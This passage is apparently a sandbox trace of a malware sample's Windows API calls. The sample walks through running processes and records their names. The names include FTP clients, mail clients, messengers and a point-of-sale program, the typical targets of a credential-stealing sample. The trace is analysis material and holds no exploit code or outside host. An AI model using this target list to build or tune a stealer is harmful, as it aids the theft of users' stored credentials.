(dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x434) returned 0x5c0 [0097.470] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 0 [0097.470] CloseHandle (hObject=0x5c0) returned 1 [0097.470] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x444) returned 0x5c0 [0097.470] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 0 [0097.471] CloseHandle (hObject=0x5c0) returned 1 [0097.471] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x46c) returned 0x0 [0097.471] CloseHandle (hObject=0x0) returned 0 [0097.471] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4a8) returned 0x5c0 [0097.471] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 0 [0097.471] CloseHandle (hObject=0x5c0) returned 1 [0097.471] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4c4) returned 0x0 [0097.471] CloseHandle (hObject=0x0) returned 0 [0097.471] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x530) returned 0x5c0 [0097.471] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 0 [0097.472] CloseHandle (hObject=0x5c0) returned 1 [0097.472] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x720) returned 0x0 [0097.472] CloseHandle (hObject=0x0) returned 0 [0097.472] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5cc) returned 0x0 [0097.472] CloseHandle (hObject=0x0) returned 0 [0097.472] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x674) returned 0x0 [0097.472] CloseHandle (hObject=0x0) returned 0 [0097.472] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x738) returned 0x0 [0097.472] CloseHandle (hObject=0x0) returned 0 [0097.472] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc0) returned 0x5c0 [0097.472] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.473] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x260000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="dsc.exe") returned 0x7 [0097.474] CloseHandle (hObject=0x5c0) returned 1 [0097.474] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x764) returned 0x5c0 [0097.474] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.475] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x880000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="spider.exe") returned 0xa [0097.475] CloseHandle (hObject=0x5c0) returned 1 [0097.476] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x678) returned 0x5c0 [0097.476] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.477] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x160000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="gorgeousmart.exe") returned 0x10 [0097.477] CloseHandle (hObject=0x5c0) returned 1 [0097.477] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6c8) returned 0x5c0 [0097.477] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.479] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xb90000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="sub.exe") returned 0x7 [0097.479] CloseHandle (hObject=0x5c0) returned 1 [0097.479] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x35c) returned 0x5c0 [0097.479] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.480] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x890000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="sink wrote.exe") returned 0xe [0097.481] CloseHandle (hObject=0x5c0) returned 1 [0097.481] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3a4) returned 0x5c0 [0097.481] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.482] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x11d0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="cant-created-milan.exe") returned 0x16 [0097.482] CloseHandle (hObject=0x5c0) returned 1 [0097.483] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x174) returned 0x5c0 [0097.483] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.484] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1250000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="extensionsremedyconventional.exe") returned 0x20 [0097.484] CloseHandle (hObject=0x5c0) returned 1 [0097.484] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x424) returned 0x5c0 [0097.484] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.486] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xa30000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="aimsresource.exe") returned 0x10 [0097.486] CloseHandle (hObject=0x5c0) returned 1 [0097.486] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x594) returned 0x5c0 [0097.486] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.487] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xa10000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="particles.exe") returned 0xd [0097.488] CloseHandle (hObject=0x5c0) returned 1 [0097.488] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x688) returned 0x5c0 [0097.488] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.489] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xb0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="we_spirituality.exe") returned 0x13 [0097.489] CloseHandle (hObject=0x5c0) returned 1 [0097.489] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x478) returned 0x5c0 [0097.489] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.491] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x830000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="strips_transmission_dialogue.exe") returned 0x20 [0097.491] CloseHandle (hObject=0x5c0) returned 1 [0097.491] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7f0) returned 0x5c0 [0097.491] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.492] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x3a0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="traveller_chevrolet.exe") returned 0x17 [0097.493] CloseHandle (hObject=0x5c0) returned 1 [0097.493] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x80c) returned 0x5c0 [0097.493] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.494] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x350000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="including.exe") returned 0xd [0097.495] CloseHandle (hObject=0x5c0) returned 1 [0097.495] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x81c) returned 0x5c0 [0097.495] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.496] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1220000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="safari_hungary.exe") returned 0x12 [0097.496] CloseHandle (hObject=0x5c0) returned 1 [0097.496] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x82c) returned 0x5c0 [0097.497] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.498] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x960000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="methods.exe") returned 0xb [0097.498] CloseHandle (hObject=0x5c0) returned 1 [0097.498] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x83c) returned 0x5c0 [0097.498] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.499] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xd40000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="kansas-cleveland-textiles.exe") returned 0x1d [0097.500] CloseHandle (hObject=0x5c0) returned 1 [0097.500] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x84c) returned 0x5c0 [0097.500] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.501] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xd90000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="destroy-pressed.exe") returned 0x13 [0097.502] CloseHandle (hObject=0x5c0) returned 1 [0097.502] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x85c) returned 0x5c0 [0097.502] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.503] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xd00000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="sheriff obtain.exe") returned 0x12 [0097.503] CloseHandle (hObject=0x5c0) returned 1 [0097.503] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x86c) returned 0x5c0 [0097.503] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.505] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x910000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="pockets_lower_rec.exe") returned 0x15 [0097.505] CloseHandle (hObject=0x5c0) returned 1 [0097.505] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x87c) returned 0x5c0 [0097.505] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.506] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xa10000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="deutschland although language.exe") returned 0x21 [0097.507] CloseHandle (hObject=0x5c0) returned 1 [0097.507] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x88c) returned 0x5c0 [0097.507] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.508] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xc10000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="3dftp.exe") returned 0x9 [0097.508] CloseHandle (hObject=0x5c0) returned 1 [0097.508] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x89c) returned 0x5c0 [0097.508] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.510] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1250000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0097.510] CloseHandle (hObject=0x5c0) returned 1 [0097.510] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8ac) returned 0x5c0 [0097.510] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.512] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x190000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="alftp.exe") returned 0x9 [0097.512] CloseHandle (hObject=0x5c0) returned 1 [0097.512] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8bc) returned 0x5c0 [0097.512] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.514] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xdf0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="barca.exe") returned 0x9 [0097.514] CloseHandle (hObject=0x5c0) returned 1 [0097.514] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8cc) returned 0x5c0 [0097.514] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.515] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1b0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="bitkinex.exe") returned 0xc [0097.516] CloseHandle (hObject=0x5c0) returned 1 [0097.516] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8dc) returned 0x5c0 [0097.516] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.517] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x3c0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="coreftp.exe") returned 0xb [0097.517] CloseHandle (hObject=0x5c0) returned 1 [0097.517] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8f4) returned 0x5c0 [0097.517] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.519] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x20000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="far.exe") returned 0x7 [0097.519] CloseHandle (hObject=0x5c0) returned 1 [0097.519] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x904) returned 0x5c0 [0097.519] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.520] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x12b0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="filezilla.exe") returned 0xd [0097.521] CloseHandle (hObject=0x5c0) returned 1 [0097.521] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x914) returned 0x5c0 [0097.521] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.522] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1120000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="flashfxp.exe") returned 0xc [0097.522] CloseHandle (hObject=0x5c0) returned 1 [0097.522] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x924) returned 0x5c0 [0097.522] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.524] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xdb0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="fling.exe") returned 0x9 [0097.524] CloseHandle (hObject=0x5c0) returned 1 [0097.524] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x934) returned 0x5c0 [0097.524] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.525] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xab0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0097.526] CloseHandle (hObject=0x5c0) returned 1 [0097.526] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x944) returned 0x5c0 [0097.526] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.527] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xc90000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0097.527] CloseHandle (hObject=0x5c0) returned 1 [0097.528] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x954) returned 0x5c0 [0097.528] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.529] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x9e0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="icq.exe") returned 0x7 [0097.529] CloseHandle (hObject=0x5c0) returned 1 [0097.529] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x964) returned 0x5c0 [0097.529] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.530] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x920000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="leechftp.exe") returned 0xc [0097.531] CloseHandle (hObject=0x5c0) returned 1 [0097.531] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x974) returned 0x5c0 [0097.531] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.532] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x11c0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="ncftp.exe") returned 0x9 [0097.532] CloseHandle (hObject=0x5c0) returned 1 [0097.532] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x984) returned 0x5c0 [0097.532] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.533] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xae0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="notepad.exe") returned 0xb [0097.534] CloseHandle (hObject=0x5c0) returned 1 [0097.534] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x994) returned 0x5c0 [0097.534] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.535] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xb70000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="operamail.exe") returned 0xd [0097.535] CloseHandle (hObject=0x5c0) returned 1 [0097.535] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a4) returned 0x5c0 [0097.535] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.536] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xb50000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="outlook.exe") returned 0xb [0097.536] CloseHandle (hObject=0x5c0) returned 1 [0097.536] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b4) returned 0x5c0 [0097.536] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.537] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xef0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="pidgin.exe") returned 0xa [0097.538] CloseHandle (hObject=0x5c0) returned 1 [0097.538] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9c4) returned 0x5c0 [0097.538] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.539] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xbb0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="scriptftp.exe") returned 0xd [0097.539] CloseHandle (hObject=0x5c0) returned 1 [0097.539] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9d4) returned 0x5c0 [0097.539] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.540] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1320000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="skype.exe") returned 0x9 [0097.540] CloseHandle (hObject=0x5c0) returned 1 [0097.540] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9e4) returned 0x5c0 [0097.540] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.541] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xe10000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="smartftp.exe") returned 0xc [0097.542] CloseHandle (hObject=0x5c0) returned 1 [0097.542] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9f4) returned 0x5c0 [0097.542] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.543] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x150000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="thunderbird.exe") returned 0xf [0097.543] CloseHandle (hObject=0x5c0) returned 1 [0097.543] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa04) returned 0x5c0 [0097.543] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.544] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x8b0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="totalcmd.exe") returned 0xc [0097.544] CloseHandle (hObject=0x5c0) returned 1 [0097.544] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa14) returned 0x5c0 [0097.544] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.545] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1030000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="trillian.exe") returned 0xc [0097.545] CloseHandle (hObject=0x5c0) returned 1 [0097.546] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa24) returned 0x5c0 [0097.546] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.547] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1200000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="webdrive.exe") returned 0xc [0097.547] CloseHandle (hObject=0x5c0) returned 1 [0097.547] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa34) returned 0x5c0 [0097.547] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.548] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1130000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="whatsapp.exe") returned 0xc [0097.548] CloseHandle (hObject=0x5c0) returned 1 [0097.548] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa44) returned 0x5c0 [0097.548] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.549] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x890000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="winscp.exe") returned 0xa [0097.549] CloseHandle (hObject=0x5c0) returned 1 [0097.550] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa54) returned 0x5c0 [0097.550] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.551] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x80000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0097.551] CloseHandle (hObject=0x5c0) returned 1 [0097.551] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa64) returned 0x5c0 [0097.551] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.552] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x2c0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="active-charge.exe") returned 0x11 [0097.552] CloseHandle (hObject=0x5c0) returned 1 [0097.552] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa74) returned 0x5c0 [0097.552] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.553] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x880000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="accupos.exe") returned 0xb [0097.554] CloseHandle (hObject=0x5c0) returned 1 [0097.554] 